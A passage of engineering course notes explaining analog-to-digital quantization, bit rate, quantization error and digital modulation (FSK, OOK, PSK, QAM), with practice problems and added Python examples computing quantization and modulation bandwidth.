The following figures represent conceptually how a 3-bit A/D converter converts an analog signal into bits. In these figures, the analog signal is shown as well as the samples, with samples taken every 0.5 msec (corresponding to a sample rate of fs = 1/0.0005 sec = 2000 samples/sec). The actual analog sample voltages are shown in parentheses next to the samples. Here, the voltage range of the signal is divided into 2^3 = 8 smaller voltage intervals (also called steps). These are separated by the dashed, bold horizontal lines, and each interval is 0.25 V wide:

q = (vmax - vmin) / 2^N = (1 - (-1)) / 8 = 0.25 V

The value of q is more formally called the quantizer’s resolution. Each of the voltage intervals is assigned an N-bit binary number representing the integers from 0 to 2^N - 1. For this example, you can see that since we are using a 3-bit A/D, the intervals will be assigned binary numbers representing the integers from 0 to 7 (that is, 000, 001, 010, …, 111), starting from the bottom of the voltage range. In this case, the digital word 000 is assigned to the voltages from -0.75 V to -1.0 V, 001 is assigned to the voltages from -0.5 V to -0.74999 V…, and so on. The figure that follows shows for each quantization interval the associated 3-bit digital word (on the left side of the plot). Any analog sample that falls in a given voltage interval will result in those 3 bits being transmitted. When a sample point falls within a given interval, it is assigned the corresponding binary word (this is the Encoding part of Quantization/Encoding).
For the first sample point at time 0, the voltage is 0.613 V, which means that sample is assigned a binary value of 110. The A/D then creates a voltage signal that represents these bits, and that process continues as long as an analog signal is input to it.

The binary representation of the above signal is: 110 101 100 011 011 100 110 110 100 010 000 000 001.

In this example, every sample produces 3 bits (that is, there are 3 bits/sample). The sample rate was 2000 samples/sec. Multiplying these two values together results in the bit rate (Rb) produced from this A/D conversion:

Rb = 3 bits/sample × 2000 samples/sec = 6000 bits/sec (bps)

To the right of the plot above is the quantization level associated with each voltage interval. Any analog sample voltage that falls in a given interval is effectively estimated to the center of its quantization level when it is desired to reconstruct the analog signal from the received bits (a receiver may perform this). This process is referred to as Digital-to-Analog conversion (D/A) and will be discussed briefly in the next section. For this example, the quantization level for the lowest voltage interval is the value halfway between -0.75 V and -1 V (which is -0.875 V). This means that any analog sample that fell into this range will be represented as -0.875 V.

Alright, we’ve walked through an A/D example together; now it’s your turn.

Practice Problem 21.2 Consider the following analog waveform. This waveform is sampled at a 500 Hz rate and quantized with a 2-bit quantizer (i.e., A/D converter). The input range is -1.0 to +1.0 V.
a. Circle the sample points (first sample is at time t = 0 sec).
b. Indicate the quantization intervals and corresponding digital words.
c. Indicate the digital word assigned to each sample point.
d. What is the stream of binary bits generated after the A/D conversion is complete?
e. What is the resulting bit rate from this A/D?
(Figure: analog waveform for Practice Problem 21.2, Amplitude (volts) versus time (msec))

To give you an idea, here’s the effect of quantizing in a digital picture. Look at a color display of this picture (such as the pdf file of the notes posted on the course website). See the difference?

4 bit = 16 colors    8 bit = 256 colors

Here is an example of a digital voltage waveform that might have been generated from an A/D process:

011100110111111110011001

This waveform could be transmitted from the transmitter to the receiver over a wire, but is not suitable to transmit wirelessly through the atmosphere. We’ll get into more detail about how this is done in our next chapter on digital modulation.

5. Conversion from Digital to Analog (D/A)

But how do we recover the analog information after it has been converted to digital? As mentioned earlier, the receiver converts these N-bit digital words back into an analog signal. This process is called digital-to-analog (D/A) conversion. It is essentially the reverse of the analog-to-digital conversion process. The analog signal is reconstructed by converting the N-bit digital words into the appropriate quantization levels, and this voltage is “held” for one sample period, creating a stairstep-type signal shown below.

Good job. We’ve regenerated our original signal. How does it compare with the original? Let’s see. The reconstructed analog signal for our 3-bit example is shown in a thick black line in the next figure, along with the 3-bit digital word that represents each sample. The original analog signal is also shown in the continuous line, along with all of the sample points that were on the earlier figures.

Is it close? It follows the same general shape. Even if we perform filtering to smooth out the reconstructed signal to remove its staircase appearance (which is typical), it will still not quite be the same as the original red signal. Why? Is that the best we can do?

6. Quantization Error. There is always error introduced with the A/D process.
The error is the difference between the original analog signal and the reconstructed (stairstep) signal after A/D and D/A. The following figure is a portion of a music signal that has been quantized with 3 bits. The upper plot shows the original analog signal along with the recovered analog signal from the A/D process. The bottom plot is the quantization error, which is created by subtracting the recovered signal from the original analog signal at each instant of time.

So is it bad? It can be. The quantization error manifests as noise in the reconstructed analog signal. For digital audio signals (music or voice), it can sound like static. The greater the quantization noise, the louder the static, making it harder to hear the voice or music. Reiterating what was presented in Chapter 19: NOISE IS THE NUMBER ONE LIMITING FACTOR IN COMMUNICATION SYSTEMS. In this case, if quantization is part of the communication system (e.g., using a digital communication system to transmit analog information), then the A/D process adds even more noise to the signal as it moves from transmitter to receiver.

So how do we reduce the quantization error and its associated noise? Quantization error can be reduced by increasing the number of bits N for each sample. This will make the quantization intervals smaller, reducing the difference between the analog sample values and the quantization levels. The figure below is the same analog signal quantized with 4 bits per sample. Note the step size is smaller than in the 3-bit plot (½ the size), and the noise signal is approximately ½ the amplitude of what it was with 3-bit quantization. The reconstructed signal looks much closer to the original analog signal compared to the 3-bit A/D. It is worth noting that increasing the sampling frequency will not reduce quantization noise; only increasing the number of quantization levels will do this.
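The whole A/D and D/A chain of this chapter (Nyquist check, sampling, N-bit quantizing/encoding, bit rate, reconstruction to the interval centre, and the resulting quantization error) as an added Python example; this is not code from the course notes. The class and function names are my own, the input range defaults to the -1.0 to +1.0 V used in the text, and the sine wave in the demo is a constructed test signal.

```python
import math


def nyquist_rate(f_max_hz):
    """Nyquist rate fN = 2*fmax; the sample rate must exceed it (fs > fN) to avoid aliasing."""
    return 2.0 * f_max_hz


def sampled_fast_enough(fs_hz, f_max_hz):
    """True when fs is strictly greater than the Nyquist rate for this signal."""
    return fs_hz > nyquist_rate(f_max_hz)


def sample(signal, fs_hz, duration_s):
    """Sample a continuous-time signal (a Python function of t) every T = 1/fs seconds."""
    T = 1.0 / fs_hz
    n = int(round(duration_s * fs_hz))
    return [signal(k * T) for k in range(n)]


class Quantizer:
    """Uniform N-bit quantizer/encoder over [vmin, vmax], as in the 3-bit A/D example."""

    def __init__(self, n_bits, vmin=-1.0, vmax=1.0):
        self.n = n_bits
        self.vmin, self.vmax = vmin, vmax
        self.levels = 2 ** n_bits
        self.q = (vmax - vmin) / self.levels  # resolution: width of each interval, in volts

    def encode(self, v):
        """Index (0 .. 2^N-1) of the q-wide interval containing sample v, counting up from vmin."""
        v = min(max(v, self.vmin), self.vmax)  # an A/D clips anything outside its input range
        idx = int((v - self.vmin) / self.q)
        return min(idx, self.levels - 1)  # vmax itself belongs to the top interval

    def word(self, idx):
        """N-bit digital word for an interval index, e.g. index 6 -> '110' when N = 3."""
        return format(idx, f"0{self.n}b")

    def level(self, idx):
        """Quantization level: the centre of the interval (what a D/A reconstructs)."""
        return self.vmin + (idx + 0.5) * self.q

    def encode_stream(self, samples):
        """A/D output for a list of sample voltages, as space-separated N-bit words."""
        return " ".join(self.word(self.encode(v)) for v in samples)

    def decode_stream(self, bits):
        """D/A input: space-separated N-bit words -> list of reconstructed voltages."""
        return [self.level(int(w, 2)) for w in bits.split()]


def bit_rate_bps(n_bits, fs_hz):
    """Rb = bits/sample x samples/sec."""
    return n_bits * fs_hz


def quantization_error(quantizer, samples):
    """Original minus recovered voltage, sample by sample (the noise the A/D adds)."""
    return [v - quantizer.level(quantizer.encode(v)) for v in samples]


def max_abs_error(quantizer, samples):
    """Largest quantization error magnitude; never more than q/2 for in-range samples."""
    return max(abs(e) for e in quantization_error(quantizer, samples))


if __name__ == "__main__":
    # Constructed test signal: 50 Hz sine, 1 V amplitude, sampled at 2000 Hz for 20 ms.
    sig = lambda t: math.sin(2 * math.pi * 50 * t)
    fs = 2000
    print("fs > fN ?", sampled_fast_enough(fs, 50))
    samples = sample(sig, fs, 0.020)
    for n in (3, 4):  # halving q halves the worst-case error, as the 4-bit figure shows
        qz = Quantizer(n)
        print(f"{n}-bit: q = {qz.q} V, Rb = {bit_rate_bps(n, fs)} bps, "
              f"max |error| = {max_abs_error(qz, samples):.4f} V")
        print("  first words:", qz.encode_stream(samples[:8]))
```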
We of course can’t use an infinite number of bits, so some quantization noise is always inevitable, but the nice thing about the human ear/brain (sticking with the example of audio signals) is that beyond a certain number of bits for each sample, the associated quantization noise becomes imperceptible. We just need enough bits to make the recovered signal “good enough” (e.g., the recovered music sounds “good enough”).

Problems

1. What is the greatest advantage that digital communication has over analog communication?
2. Describe the function of a regenerative repeater.
3. What is the cause of aliasing in the A/D process?
4. Why does a 5-bit quantizer produce a better approximation to an analog signal than a 3-bit quantizer?
5. A music signal has frequency content from 0 Hz up to 18.75 kHz. What sampling frequency must be exceeded for successful A/D conversion? What is another name for the minimum sampling frequency?
6. Consider the following analog waveform. This waveform is to be sampled at a 1-kHz rate and quantized with a 3-bit quantizer (input voltage range is -1.0 to +1.0 V).
a. What is the resolution (q) of this quantizer?
b. Circle the sample points on the analog waveform below.
c. Indicate the quantization intervals and corresponding digital words.
d. Indicate the digital word assigned to each sample point.
e. When a receiver receives the transmitted bits, D/A is used to recover the analog signal, but the recovered signal is not the same as the original analog signal. What is the term to describe this difference and what can be done to minimize this difference?
(Figure: analog waveform for Problem 6, Voltage (V) from -1.000 to 1.000 versus Time (ms) from 0 to 8)
7. Consider the following analog waveform. This waveform is to be sampled at a 1.333333 MHz rate and quantized with a 3-bit quantizer (input voltage range is -2.0 to +2.0 V).
a. What is the resolution (q) of this quantizer?
b. Circle the sample points on the analog waveform below.
c. Indicate the quantization intervals and corresponding digital words.
d. Indicate the digital word assigned to each sample point.
(Figure: analog waveform for Problem 7, amplitude (V) from -2 to 2 versus time (microsec) from 0 to 5)

Chapter 22: Digital Modulation

Objectives:
(a) Quantitatively describe the relationship between a symbol and a bit and the bit rate and the baud.
(b) Describe how digital information is conveyed using various digital modulation techniques (ASK or OOK, FSK, PSK and QAM) and recognize their waveforms and constellations.
(c) Calculate the bandwidth of an ASK, FSK, PSK, or QAM signal.
(d) Using a constellation diagram, analyze an M-ary PSK signal to determine its symbols and bits per symbol.
(e) Discuss the effect of noise on M-ary PSK and how Quadrature Amplitude Modulation (QAM) overcomes these detrimental effects.

1. Digital Signal Frequency Spectrum

In Chapter 21, it was mentioned that in many cases we wish to convert analog signals into digital signals to take advantage of the benefits of digital technologies. Samples of the analog signal were converted into bits, and the bits were then used to create a binary voltage waveform that represented the bits. If we then wanted to transmit this digital waveform through free space, all we need to do is connect it to an antenna, right? No, it is not that easy. The binary voltage waveforms to which we are so accustomed are, typically, voltage pulses that alternate between 0 V (for a 0-bit) and 5 V (for a 1-bit). It just so happens that the preponderance of frequency content in these voltage pulses is very low (a baseband signal), and just as was pointed out for voice signals (which also have low frequency content), an antenna needed to transmit this kind of signal through free space would be impracticably large. For a large number of random voltage pulses, the frequency plot would look something like the following, where Rb is the value of the bit rate in Hz.
For example, if the bit rate were 500 bps, then the frequency content magnitude would be equal to zero at 500 Hz, 1000 Hz, etc. This plot of frequency content is much different than that of a signal composed of sinusoids! There are no spikes! Nevertheless, most of the frequency content is at very low frequencies. The frequency content does continue out to an infinite frequency, although the magnitude drops dramatically at higher frequencies. In a perfect world, we’d say the bandwidth of voltage pulses approaches ∞ Hz, but for digital signals, we’ll use the null-bandwidth as our calculated bandwidth. The null-bandwidth is defined as the amount of the frequency spectrum (in Hz) from the maximum magnitude (which occurs at 0 Hz) to where the spectrum first goes to a magnitude of 0 (called a null, here at Rb Hz). The bandwidth is given by:

BW = f2 - f1 = Rb - 0 = Rb Hz

We must come up with a method to transmit the digital information (1s and 0s) using radio waves. Digital modulation techniques allow this. As you recall, the goal of modulation is to upshift the frequency spectrum of the information signal to allow transmission through free space; the transmitted signal’s frequency spectrum would then look like the following.

Recall that, as in analog amplitude modulation, the information signal’s frequency spectrum is shifted up by fc Hz, and there is a mirror image of the frequency content on the left side of fc. The transmission bandwidth (using the null-bandwidth definition) is now

BW = f2 - f1 = (fc + Rb) - (fc - Rb) = 2Rb Hz

2. Binary Digital Modulation

Recall the equation for a high frequency carrier: vc(t) = Vc sin(2πfct + θ). As discussed in Chapter 20, a sinusoidal carrier can be modulated by varying its amplitude, frequency, or phase using an information signal. So, how do we go about representing 1s and 0s with modulation?
Just as we can vary the amplitude, frequency, and phase of a high-frequency carrier in accordance with an analog waveform, we can do the same with a digital waveform. Since bit values shift between 0s and 1s, digital modulation techniques that vary the carrier’s amplitude, frequency, and phase are referred to as “shift keying.”

Frequency Shift Keying (FSK)

Frequency-shift keying (FSK) is a frequency modulation scheme in which digital information is transmitted through discrete frequency changes (shifts) of a carrier wave. The simplest form of FSK is Binary FSK (BFSK), in which a carrier’s frequency is shifted to a low frequency or a high frequency to transmit 0s and 1s. The plot below shows a sample FSK signal along with the associated bits.

An example of how FSK was used “back in the day” was with dial-up modems to connect your home computer to your Internet service provider over your analog phone line. With a modem, a 0-bit was represented with a lower frequency carrier of 1070 Hz and a 1-bit was represented with a higher carrier frequency of 1270 Hz. The lower frequency, binary 0, was called the “space” frequency, while the higher frequency, binary 1, was called the “mark” frequency. The terms mark/space were a throwback to the days of Morse code or flashing light communications.

In the frequency domain, we consider FSK to be two different digital transmissions, one at the mark frequency (the higher frequency) and one at the space frequency (the lower frequency). The resulting frequency plot would look like the following, with the carrier frequency being shifted between the mark and space frequencies. The amount that the carrier frequency can be shifted is called the frequency deviation (Δf). To determine the bandwidth for FSK modulation, we take a closer look at the frequency spectrum around the mark and space frequencies. We use the null-bandwidth definition to compute the bandwidth as shown below.
In the figure, the bandwidth effectively runs from the first null to the left of fspace to the first null to the right of fmark. Mathematically, there are two equations that can be used to compute the bandwidth:

BW = (fmark + Rb) - (fspace - Rb) = fmark - fspace + 2Rb

or

BW = 2(Δf + Rb)

Practice Problem 22.1 You have an FSK transmitter using a carrier of 500 kHz sending 10 kbps and a frequency deviation of 100 kHz. How much bandwidth do you need for your transmission?

Of course, who still uses dial-up? What else is there?

Amplitude Shift Keying (ASK) and On-Off Keying (OOK)

Amplitude Shift Keying is a form of amplitude modulation that represents digital data as shifts in the amplitude of a carrier wave: for example, small amplitude for a 0-bit, and larger amplitude for a 1-bit. We have seen what an ASK signal looks like before, in Chapter 21, repeated below. The simplest digital modulation scheme is a form of ASK called on-off keying (OOK). This is analogous to Morse code. In OOK, a carrier is transmitted for a 1-bit and nothing is transmitted for a 0-bit; this is the same as saying that the smaller ASK amplitude is 0. Note that in all forms of ASK, the frequency and phase of the carrier are the same for all outputs; it is the amplitude that changes.

Practice Problem 22.2 Sketch an OOK signal that represents the bit stream below.
1 0 0 0 1 1

Before we continue, you need to learn some important terms that are used in digital communication systems. The information is carried in the bits that are transmitted, but we don’t actually transmit bits; we transmit waveforms that represent bits. These waveforms are commonly referred to as symbols. On a wire, the symbols take the form of voltage pulses. In FSK and OOK, the symbols take the form of a high frequency carrier that has its frequency or amplitude altered based on whether a 0-bit or a 1-bit is being transmitted.
In these modulation schemes, the number of symbols that can be transmitted (M) is two (M = 2), and each symbol represents one bit of data. For FSK and OOK, the time duration of a bit is the same as the time duration of a symbol (Tb = Tsym). We will soon see other digital modulation schemes where a symbol can represent more than one bit. In general, the number of symbols for a modulation type is related to the number of bits associated with each symbol. If N is the number of bits per symbol,

M = 2^N and N = log2 M.

The relationship between bits and symbols for an OOK signal is shown in the next figure.

Bitrate (Rb) is the speed of transfer of data (number of bits per second). Bitrate is inversely related to bit duration (Tb), which is the time required to transmit a single bit.

Rb = 1/Tb

Baud (also referred to as Symbol Rate) (Rsym, also written Rs) is the number of symbols transmitted per second, and is inversely related to the Symbol duration (Tsym), which is the time required to transmit one symbol.

Rsym = 1/Tsym

The Bitrate and the Baud (or Symbol Rate) are related by the number of bits per symbol (N).

Rb = Rs × N

The bandwidth associated with OOK is what we have seen before, BW = 2Rb, as shown in the figure below. As you’ll see shortly, the symbol rate (Rs) has a noted effect on the bandwidth required for transmission. In general, for all digital modulation schemes that we will discuss (except for FSK), bandwidth is given by:

BW = 2Rb / N

In the case of OOK, since N = 1 bit/symbol, BW = 2Rb = 2Rs, as stated before. For example, for OOK, if the bitrate is 600 kbps, the symbol rate is 600,000 symbols/sec, and the bandwidth is 2(600,000) = 1.2 MHz.

Phase Shift Keying (PSK)

Phase shift keying (PSK) is a form of phase modulation where the carrier’s phase shifts to one of a finite set of possible phases based on the bits that are input.
For binary phase shift keying (BPSK), the carrier phase is shifted between one of two phases (typically 0° and 180°) depending on whether a 0-bit or a 1-bit is being transmitted. For example:

0-bit: the symbol transmitted is Vc sin(2πfct).
1-bit: the symbol transmitted is Vc sin(2πfct + 180°) = -Vc sin(2πfct).

It is important to point out that in PSK, the amplitude of all output symbols is the same; it is the phase of the output symbols that is different.

Up to this point we have discussed digital modulation with one bit per symbol, which means that at any time, one of two possible symbols would be transmitted. But as mentioned earlier, it is possible to have a modulation scheme with more than one bit per symbol; this is referred to as M-ary digital modulation.

3. M-ary Digital Modulation

Before launching into more complicated digital modulation, we’ll introduce a graphical way to relate output symbols to the bits they represent. This is called a constellation diagram. A constellation is a plot of relative amplitude and phase of the output symbols for a digital modulation system. Each dot describes a symbol, which is represented by its polar coordinates. In terms of phase, 0° is along the positive x-axis, and phase increases as you move counterclockwise around the x-y plane. Relative amplitude is measured as distance from the origin of the plot. The possible output symbols are represented with filled-in circles, and adjacent to them are the bits they represent. For example, here are two possible BPSK systems’ constellation diagrams. In BPSK, the output symbols both have the same amplitude (both of the symbols are equidistant from the origin), but their phases are 180° apart. There are other possible combinations of two carrier phases that might be used (such as +90° and -90°), but the actual constellation used is not important, as long as the transmitter and receiver use the same constellation.
Note that BPSK transmits 1 bit per symbol, so only one bit value is placed next to each symbol.

If it is desired to get the information from the transmitter to the receiver faster, we need to increase the number of bits per second (bps) that are transmitted. The cost of increasing the bitrate (besides requiring more complex components) is that it increases the transmission bandwidth: recall that for OOK BW = 2Rb, and from Chapter 19, that bandwidth can be expensive! Is there a way to transmit a higher bitrate but using a smaller transmission bandwidth? The answer is yes, using M-ary digital modulation. In M-ary modulation, we can preserve bandwidth if we keep the symbol rate the same and increase the number of bits per symbol. For example, instead of transmitting just 2 possible phase shifts (0° and 180°), we could transmit one of 4 possible phase shifts per symbol. This is called quadrature phase shift keying (QPSK).

Quadrature Phase Shift Keying (QPSK)

In QPSK, there are 4 symbols (M = 4) and there are 2 bits per symbol (N = 2 = log2 M). Two of the many possible constellation diagrams for QPSK are shown in the following figure, and the four symbols from QPSK Constellation #2 are shown to the right of this constellation. The carrier with a phase of 0° is plotted in a dashed red line with each symbol for reference. The four symbols in the right-hand constellation are: sin(2πfct + 45°), sin(2πfct + 135°), sin(2πfct - 135°), and sin(2πfct - 45°).

The following figure is a plot of the use of QPSK constellation #2 to transmit the bit stream 0001111000110110. Also shown is the bit duration, and the symbol duration for QPSK.

The frequency spectrum for M-ary modulation schemes is shown in the figure below, which also specifies the frequency axis for QPSK. If the bitrate is constant, the benefit of transmitting more than one bit in a symbol can be seen in the fact that the nulls are closer to the carrier frequency.
From the figure, it is seen that the bandwidth for QPSK is given by

BW = (fc + Rb/2) - (fc - Rb/2) = Rb Hz.

This is confirmed by the equation for bandwidth for all digital modulation schemes (except for FSK),

BW = 2Rb / N

where N = 2 for QPSK. For example, if the bitrate is 600 kbps, BW = 2(600,000)/2 = 600 kHz.

M-ary PSK

We can further increase the number of bits per symbol by increasing the number of possible phase shifts. The M in M-ary refers to the number of symbols. Consider the 8-PSK constellation to the right (one of many possible 8-PSK constellations). How many bits per symbol are transmitted? There are 8 symbols (M = 8), so N = log2 M = log2 8 = 3 bits/symbol. This is also evident from the diagram because the three bits associated with each symbol appear next to the symbol. What is the bandwidth for 8-PSK? Since N = 3 bits/symbol, bandwidth is given by

BW = 2Rb / N = 2Rb / 3.

For example, if the bitrate is 600 kbps, bandwidth for 8-PSK is BW = 2(600,000)/3 = 400 kHz.

We could further increase to 4 bits/symbol using 16-PSK. Here, M = 16 and N = 4 bits/symbol. A 16-PSK constellation is shown to the right, where each phase is separated by 360°/16 = 22.5°. More complex M-ary PSK modulation is possible: 16-PSK, 32-PSK, etc., but it becomes more susceptible to noise as the symbols get closer together.

As a reminder, for PSK, all of the symbols have the same carrier frequency and amplitude; it is their phase that is different. For that reason, on a constellation diagram, all of the symbols for PSK appear on a circle about the origin.

To demodulate any type of PSK, a receiver must determine the phase of the received symbol. For 16-PSK, the receiver must determine the phase within 11.25°, since the phases are separated by 22.5°. A portion of the constellation diagram for 16-PSK is shown to the right, indicating the wedge of phase values that separates one of the symbols from the adjacent symbols.
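The bit/symbol, baud and null-bandwidth relations of this chapter (M = 2^N, Rb = Rs × N, BW = 2Rb/N for everything but FSK, and the two FSK forms) as an added Python example, not code from the course notes; it reproduces the 600 kbps figures worked in the text and adds a search for the smallest constellation that fits a bandwidth budget. The function names are my own, and the 300 bps used with the 1070/1270 Hz modem tones is an assumed bit rate.

```python
# Null-bandwidth relations from this chapter (rates in bits or symbols per second):
#   M = 2**N, N = log2(M), Rb = Rs * N
#   OOK/ASK, PSK, QAM:  BW = 2 * Rb / N
#   binary FSK:         BW = (fmark + Rb) - (fspace - Rb) = 2 * (df + Rb)


def bits_per_symbol(m_symbols):
    """N = log2(M). M must be a power of two for N to be a whole number of bits."""
    if m_symbols < 2 or m_symbols & (m_symbols - 1):
        raise ValueError(f"M = {m_symbols} is not a power of two")
    return m_symbols.bit_length() - 1


def symbols_per_second(bit_rate_bps, m_symbols):
    """Baud (symbol rate) Rs = Rb / N."""
    return bit_rate_bps / bits_per_symbol(m_symbols)


def bandwidth_hz(bit_rate_bps, m_symbols):
    """Null bandwidth for OOK/ASK, M-ary PSK or M-ary QAM (every scheme except FSK)."""
    return 2.0 * bit_rate_bps / bits_per_symbol(m_symbols)


def fsk_bandwidth_hz(bit_rate_bps, f_mark_hz, f_space_hz):
    """Binary FSK null bandwidth: first null left of fspace to first null right of fmark."""
    return (f_mark_hz + bit_rate_bps) - (f_space_hz - bit_rate_bps)


def fsk_bandwidth_from_deviation_hz(bit_rate_bps, deviation_hz):
    """Same quantity written with the frequency deviation df = (fmark - fspace) / 2."""
    return 2.0 * (deviation_hz + bit_rate_bps)


def smallest_constellation(bit_rate_bps, bw_budget_hz, max_bits=16):
    """Smallest M (a power of two) whose null bandwidth fits the budget at this bit rate,
    i.e. how many bits per symbol must be packed in to keep Rs, and so BW, low enough."""
    for n in range(1, max_bits + 1):
        if bandwidth_hz(bit_rate_bps, 2 ** n) <= bw_budget_hz:
            return 2 ** n
    raise ValueError("no constellation up to 2**max_bits fits the bandwidth budget")


def bandwidth_table(bit_rate_bps,
                    schemes=((2, "OOK/BPSK"), (4, "QPSK"), (8, "8-PSK/8-QAM"), (256, "256-QAM"))):
    """(name, N, Rs, BW) rows for one bit rate, like the 600 kbps examples in the notes."""
    return [(name, bits_per_symbol(m), symbols_per_second(bit_rate_bps, m),
             bandwidth_hz(bit_rate_bps, m)) for m, name in schemes]


if __name__ == "__main__":
    for name, n, rs, bw in bandwidth_table(600_000):
        print(f"{name:12s} N={n:2d} bits/symbol  Rs={rs:>10,.0f} baud  BW={bw / 1e3:>8,.0f} kHz")
    # Dial-up modem tones from the notes (space 1070 Hz, mark 1270 Hz); 300 bps is assumed.
    print("FSK at 300 bps needs", fsk_bandwidth_hz(300, 1270, 1070), "Hz")
    print("Smallest M fitting 600 kbps into 500 kHz:", smallest_constellation(600_000, 500_000))
```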
Noise Effects

Recall that the single most limiting factor in communication systems is noise. In all transmissions, the received signal will be degraded by noise. The following figure shows a BPSK signal and the same signal corrupted by noise. You might imagine that it is harder for a receiver to determine the correct phase (correct symbol) that was transmitted for the noisy signal. This noise corruption can be depicted in the constellation diagram to the right, where the two transmitted BPSK symbols are indicated by the two large black circles (phase = 0° and phase = 180°), and the noisy received symbols are the red and blue circles. A BPSK receiver must make a decision to determine the phase of a received signal to determine the corresponding bit. You may imagine that if the noise is severe enough, a receiver might make a mistake, and decide that it had received a 0-bit when it actually received a 1-bit. These are called bit errors. Now, consider the same noise in the presence of an 8-PSK signal. Is it easier for the receiver to make bit errors? Yes, as more phases are used in PSK, the symbols are closer together, which makes it easier for the receiver to make bit errors (see the figure to the right). But, of course, the advantage of more symbols is a narrower bandwidth, if the bitrate is held constant. There is a way to use more symbols in modulation while reducing the chances of making bit errors: by using symbols that have different amplitudes AND phases.

Quadrature Amplitude Modulation (QAM)

In order to increase the distance between symbols in the constellation, another option is to modulate both the amplitude and the phase. This is called Quadrature Amplitude Modulation (QAM).

8-QAM

An 8-QAM constellation is shown below (one of many possible 8-QAM constellations). The eight symbols along with the 3-bit digital words corresponding to each are shown to the right of the constellation. This system uses 2 possible amplitudes and 4 possible phases.
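To make the noise trade-off above concrete, here is an added example (not from the course notes) that places M-PSK symbols in the constellation plane, adds constructed Gaussian noise, and counts how often a nearest-phase receiver decides wrongly as M grows; the symbol layout (symbol 0 at 0°) and the noise level are this example's own assumptions.

```python
"""M-ary PSK under additive noise: more symbols on the circle means more
bits per symbol but a smaller angular gap between symbols, so the same
noise causes more wrong decisions.  Added example, not from the EC310
notes; the constellation layout and noise level are constructed."""
import cmath
import math
import random


def bits_per_symbol(m):
    """N = log2(M): bits carried by each of the M symbols."""
    n = math.log2(m)
    if n != int(n):
        raise ValueError("M must be a power of two")
    return int(n)


def psk_constellation(m):
    """M unit-amplitude symbols spaced 360/M degrees apart on a circle.
    Symbol k sits at phase k*360/M degrees (assumed layout: symbol 0 at
    0 degrees; the notes' QPSK constellation #2 is this rotated by 45)."""
    return [cmath.exp(1j * 2 * math.pi * k / m) for k in range(m)]


def min_distance(points):
    """Smallest distance between any two symbols: how far noise must push
    a received point before it can be mistaken for its neighbour."""
    return min(abs(a - b) for i, a in enumerate(points)
               for b in points[i + 1:])


def decide_psk(received, m):
    """Receiver decision: measure the phase of the received point and pick
    the nearest transmitted phase (a wedge of +-180/M degrees)."""
    step = 2 * math.pi / m
    return round(cmath.phase(received) / step) % m


def symbol_error_count(m, n_symbols, noise_sigma, seed=1):
    """Send n_symbols random M-PSK symbols, add circular Gaussian noise
    (noise_sigma per axis), and count wrong decisions."""
    rng = random.Random(seed)
    points = psk_constellation(m)
    errors = 0
    for _ in range(n_symbols):
        k = rng.randrange(m)
        noise = complex(rng.gauss(0, noise_sigma), rng.gauss(0, noise_sigma))
        if decide_psk(points[k] + noise, m) != k:
            errors += 1
    return errors


def compare_psk_orders(orders=(2, 4, 8, 16), n_symbols=2000, noise_sigma=0.3):
    """Same noise and symbol count for each M: returns rows of
    (M, bits per symbol, phase spacing in degrees, symbol errors)."""
    return [(m, bits_per_symbol(m), 360 / m,
             symbol_error_count(m, n_symbols, noise_sigma))
            for m in orders]


if __name__ == "__main__":
    for m, n, spacing, errs in compare_psk_orders():
        print(f"{m:2d}-PSK: {n} bits/symbol, symbols {spacing:6.2f} deg apart, "
              f"{errs} symbol errors in 2000")
```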
In 8-QAM, the duration of a symbol is three times the duration of a bit (since each symbol carries 3 bits). Note that there are both phase and amplitude changes for each symbol.

What is the bandwidth for 8-QAM? The same as for 8-PSK, since the bandwidth for all digital modulation types (except for FSK) is given by

$BW = \dfrac{2R_b}{N}$.

And it doesn’t stop there.

Higher Level QAM Signals

QAM signals can be extended to have a larger number of signal symbols, which then gives a much higher bit rate (because there are more bits per symbol). 64-QAM and 256-QAM are common in cable modems, satellites, and high-speed fixed broadband wireless. In 256-QAM, you find that for each symbol you are transmitting (there are 256 symbols), there are 8 bits of information. Assuming the symbol rate remains constant, that means that for the same bandwidth, you are sending 8 times more information when you use 256-QAM than when you use OOK, FSK, or BPSK. For 256-QAM, if the bitrate is 600 kbps, the bandwidth is 2(600,000)/8 = 150 kHz. Now that’s powerful!

Practice Problem 22.3
Using the signal constellation shown (axes labeled 0°, 90°, 180°, and 270°), answer the following questions.
a) What type of modulation does this represent?
b) How many symbols are represented (M)?
c) How many bits per symbol are used (N)?
d) If the baud rate is 10,000 symbols/second, what is the bit rate (Rb)?
e) Would 16-QAM be more or less susceptible to noise than this type of modulation?

Practice Problem 22.4
Label the modulation schemes. (there are 2 symbols here) (there are 4 symbols here)

Problems
1. For an ASCII ‘Z,’ sketch both the On-Off Keying (OOK) binary waveform (voltage pulses) and the modulated signal, where the amplitude of the carrier is modulated to either 10 V or 0 V and Tb = 100 ms. Hint: use the ASCII table from Chapter 1 of the course notes to determine the bits that represent ‘Z’.
2. Given this FSK transmission where individual symbols are denoted by vertical lines:
a.
Draw the corresponding binary transmission (voltage pulses), assuming that the higher frequency represents a 1-bit.
b. Determine the bit rate.
c. How many bits per symbol could be conveyed if four different frequencies were used to transmit data instead of two (that is, if 4 symbols were used vice 2 symbols)?
3. The following is a BPSK transmission. The dashed vertical lines separate the bits. On this plot, a binary ‘1’ is represented by this signal:
a. Determine the transmitted bits.
b. Determine the bit rate.
c. What is the bandwidth for this transmission?
4. QAM is a combination of which two types of modulation?
5. The “forward” signal transmitted to control a remotely-controlled (RC) car is captured on an oscilloscope and displayed below. Answer the following questions with regard to this signal:
a. This modulation is binary, meaning that there are two possible symbols. What type of digital modulation is being used?
b. What is the bit rate? (Hint: Two time cursors are shown on the display as the two dashed vertical lines…these cursors isolate a single bit. Also shown are some measurements about the time cursors below the plot and to the
c. What bit sequence is represented by the O-scope display?
6. 16-QAM can be used for higher data rate transmissions.
a. How many bits are transmitted with each symbol?
b. If 4 different phases and 4 different amplitudes are used in a 16-QAM modulation system, sketch a constellation diagram that could be associated with the system (you do not need to label the bits for each symbol, just show the symbols).
c. If 8 different phases and 2 different amplitudes are used in a 16-QAM modulation system, sketch a constellation diagram that could be associated with the system (you do not need to label the bits for each symbol, just show the symbols).
d. If the bit rate associated with either of these 16-QAM systems was 1.2 Mbps, what is the bandwidth of the transmission?
7.
For a given bandwidth system, what is the advantage and disadvantage of using a multi-symbol encoding scheme (that is, using more than 2 symbols)?
8. A communication system transmits 100 kbps. For each of the following modulation types, determine the bandwidth of the transmission.
a. FSK, with frequency deviation 200 kHz.
b. OOK.
c. QPSK.
d. 16-PSK.
e. 16-QAM.
f. 512-QAM.
